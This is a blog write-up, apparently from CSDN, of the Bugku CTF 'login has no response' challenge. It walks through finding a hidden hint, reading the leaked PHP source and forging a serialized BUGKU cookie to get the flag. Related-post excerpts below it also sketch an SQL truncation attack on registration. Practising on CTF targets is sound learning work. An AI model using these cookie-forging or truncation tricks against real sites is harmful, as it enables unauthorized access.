Bugku CTF 每日一题 点login咋没反应

最新推荐文章于 2024-04-15 16:11:41 发布
最新推荐文章于 2024-04-15 16:11:41 发布
阅读量1.2k 收藏 5
点赞数 3
分类专栏: ctf 文章标签: php ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42263820/article/details/122376775
版权

点login咋没反应

1.首先出现一个登录界面 点了几下没反应,f12看一下 发现有一个

href="admin.css"

于是加到url后面看一下,发现有反馈

/* try ?21834 */
body {
    background-color: #C1DEE8;
}

页面显示中其他的算正常,但是这个try有点迷,不过这个?倒是提醒了我可以在URL后面加一下试试,加上去果然有反应
得到如下显示

<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];
if(isset($_GET['21834'])){
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{   
    echo "$flag";
}
else {
?>

又是代码审计,一行一行来

$KEY=‘ctf.bugku.com’;
ctf.bugku.com赋值给KEY

include_once(“flag.php”);
文件包含一次flag.php

$cookie = $_COOKIE[‘BUGKU’];
$_COOKIE 变量在BUGKU 取回 cookie 的值

第一个if不需要看

第二个elseif
反序列化 c o o k i e 如 果 等 于 cookie如果等于 cookieKEY返回flag
但是要注意一个点

===:三个等号我们称为等同符,当等号两边的值为相同类型的时候,直接比较等号两边的值,值相同则返回true,若等号两边的值类型不同时直接返回false。

2.思路
所以我们可以构造BUGKU的序列化和KEY的值相等来达到获取flag的目的
于是构造序列化(此环境为本地测试)

<?php

$KEY='ctf.bugku.com';
echo serialize($KEY)
//s:13:"ctf.bugku.com";
?>

所以最终payload为

BUGKU=s:13:"ctf.bugku.com";

用hackbar或者其他的提交均可

彼岸花苏陌
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugKu_login反应
Kobalos的博客
09-10 546
直接访问目标地址 看到一个登录框,但是不管输入什么击登录都反应,f12查看一下源码 看到了一个admin.css,是一个超链接,击看看 看到了一个/* try ?11268 */,看起来像是要传参的,试一下,果然发现了php代码 分析一下代码 <?php error_reporting(0); $KEY='ctf.bugku.com'; include_once("flag.php"); $cookie = $_COOKIE['BUGKU']; if(isset($_GET['112.
BugkuCTF-WEB题login1
am_03的博客
08-29 1353
知识 存在SQL约束攻击的网站,注册时通过数据库已有账户例如admin+大量空格,随意密码击注册,后端先在数据库查找select,将已有账户扩充相同长度,已有账户与注册账户(有大量空格)不等,因为有效长度不同(已有账户扩充的长度不为有效长度),之后插入insert,截断注册账户的多余长度,但后面为大量的空格,由于在SQL里执行字符串处理时,字符串末尾的空格符将会被删除,所以最后插入的注册账户即为已有账户admin,密码成为注册时的密码,即可成功登陆。 补充: 简单来说:就是在注册页面通过大量空格来超过s
bugku-web-login反应
最新发布
qq_75121443的博客
04-15 382
请求114.67.175.224:13051这个地址,而不是114.67.175.224:13051?,先得到字符串ctf.bugku.com的序列号参数s:13:"ctf.bugku.com";这里让在cookie中添加参数BUGKU,并使参数为字符串类型ctf.bugku.com。这里在cookie中添加参数BUGKU,并将字符串的序列号参数填入为值。访问后看到一个注释,叫尝试?在页面源码中看到一个css文件。并看到构建的表是post请求。
login反应 - Bugku CTF
m0_47470899的博客
07-30 1517
login反应,查看源代码发现admin.css文件 查看文件 作为参数传入,发现关键代码 只要cookie的BUGKU参数为KEY的序列化,即可实现输出flag;注意这里是elseif,既需要抓包更改GET传入值和cookie 抓包,改GET和cookie 得到flag ...
Bugku,Web:login反应
Pai_Space
12-11 2033
1.解题过程: 先进入场景,一个登录界面,随便输入账号密码登录都反应 查看源代码,发现存有网页元素的超链接 css 击进入查看 进入看到了 html 网页的元素构成 可以看到最上方被注释掉的提示,尝试 ?31351,构造 get 请求 得到一页代码 分析可知如果 cookie 变量的值经过反序列化后得到的值与 KEY 中强比较一模一样就会输出 flag 将内容主要部分截取使用 php 代码写出程序得到 cookie 的值 可以从上面的代码知道调用的 co...
bugku#login反应-writeup
qq_46202048的博客
12-16 2780
login反应 今天简单给友友们分享一下修改数据包上传的一个题型,请食用。 打开靶场 查看源码有admin.css 查看/?hint 发现admin.css 访问 发现/* try ?15057 */ 访问 分析代码 <?php error_reporting(0); $KEY='ctf.bugku.com'; include_once("flag.php"); $cookie = $_COOKIE['BUGKU']; if(isset($_GET['15
bugku-web-login反应-个人笔记
sunquan705的博客
11-10 911
bugku-web-login反应-个人笔记
Bugku WEB login反应
qq_41696858的博客
07-24 374
这题什么,日常打开页面,看源码,有一个超链接,那就进去,有提示,尝试传参13512 那就传吧,直接得到php源码,接下来就是源码分析 也啥就是一个简单的if判断 cookie要有BUGKU字段,内容要是一个序列化的ctf.bugku.com 在线PHP序列化网址 https://www.toolnb.com/dev/runCode/243e11a40a13ca67d0f13d10dadfdd48.html burp抓包 repeater,再改一下cookie就能得到flag了 参考视频链接:https
bugku_writeup】web35 login反应
kkza的博客
01-06 870
随便输入一个账号密码,login反应 当时想一下,是不是后台设置了button不能击,所以post提交不了,所以想构造一个post?还是想太多了,并有什么作用,而且这是不切实际的 有思路 。。。 。。。 仔细看一下源码或者请求接收到的内容吧 关键在于unserialize($cookie)==="$KEY" 两边序列化既有$cookie =serialize("$KEY") 在burpsuite上repeater一下 ...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
BugkuCTF-Reverse题入门逆向多解法
am_03的博客
08-28 532
补充:IDA里面十六进制转字符的快捷键:R 方法一 第一步PEID,这里可以看出程序是32位的 查壳:(无壳) 拖进IDA32分析: 先查看伪码:F5 找到main函数 发现有许多 mov 指令,66H 是 ‘f’,6CH 是 ‘l’,推测这就是 flag 的 ASCII 码值。 得到flag:flag{Re_1s_S0_C0OL} 方法二 也可以用动态调试的方法。 动态调试这就需要用到 OD。先下一个断,然后单步运行,看看栈里的变化。 例如,我就找个 0x00401475 的地址。 在 OD
bugku ctf flag.php (login反应)
qq_42777804的博客
08-03 841
打开之后 提示 hint那么访问他 是源码 <?php error_reporting(0); include_once("flag.php"); $cookie = $_COOKIE['ISecer']; if(isset($_GET['hint'])){ show_source(__FILE__); } elseif (unserialize($...
Bugku web35 login反应
weixin_44522540的博客
02-24 324
三十二、web35 login反应 查看源码,发现一个admin.css,访问 提示传参?6529,访问: 得到如下代码: <?php error_reporting(0); $KEY='ctf.bugku.com'; include_once("flag.php"); $cookie = $_COOKIE['BUGKU']; if(isset($_GET['6529'])){ show_source(__FILE__); } elseif (unserialize($cookie
Bugku-CTF之flag.php(login反应)
weixin_33874713的博客
04-19 577
Day2 flag.php(login反应) 地址:http://123.206.87.240:8002/flagphp/ 本题要:代码审计、反序列化、cookie 打开链接发现: 查看源码什么也有 注意,题目说明中 提示是hint...
bugku-login反应 writeup
Peithon的博客
04-28 2370
题目 flag.php bugku这道login反应的题,当时做的时候也是一路艰辛,写下writeup记录解题过程 1.访问http://120.24.86.145:8002/flagphp/ 2.提示是hint,试试get一个hint参数,得到源码 3.代码审计 $cookie = $_COOKIE['ISecer']; 若unserialize($...
CTF练习题[WEB]-login反应
weixin_45246254的博客
02-10 2559
https://ctf.bugku.com/challenges/detail/id/109.html?page=1 拿到题目如下 击登录反应 扫目录发现admin.css 尝试提交参数 需要在elseif处获得flag 先把KEY进行序列化 放入cookie中,获得flag
web54等ctfshow的题目无响应问题
东隅的博客
03-02 265
答案:被校园网把包拦截了,连响应都有,包里有${IFS}吧,不用校园网就行了
Login failed:make sure your username and password are correct and that you’re an admin or moderator
公子七
04-18 3370
Login failed:make sure your username and password are correct and that you’re an admin or moderator   1.使用MySql查看工具进入数据库,进入表“ofuser”,把字段 plainPassword 改成 123,然后在你的控制台上输入该表的   username跟plainPassw
CTF如何将无法击的请求键转变为可以
weixin_42586447的博客
11-12 932
首先F12源码发现我们的网页代码,在编辑区(body)中可以看到 disabled=“true”。 禁止击 于是你可以把他删除,并且你要修改一些其他的参数。至于如何修改你可以参考一下其余网页的设置。 ...
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和正则表达式,在CTF比赛中常常会遇到需要处理字符或者利用正则表达式来解题的情况。例如,有些题目会提供一段加密后的字符串,参赛者需要根据加密算法进行解密,获取隐藏在其中的flag。而在其他题目中,可能会给出一段文本,并要求参赛者使用正则表达式来匹配特定的模式或者提取特定的信息。 因此,在BugkuCTF中,对字符处理和正则表达式的理解和熟练应用是非常重要的技能之一。参赛者需要具备对字符编码、字符串操作、基本正则表达式语法等方面的知识,并能够灵活运用这些技巧来解决各种与字符和正则相关的题目。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值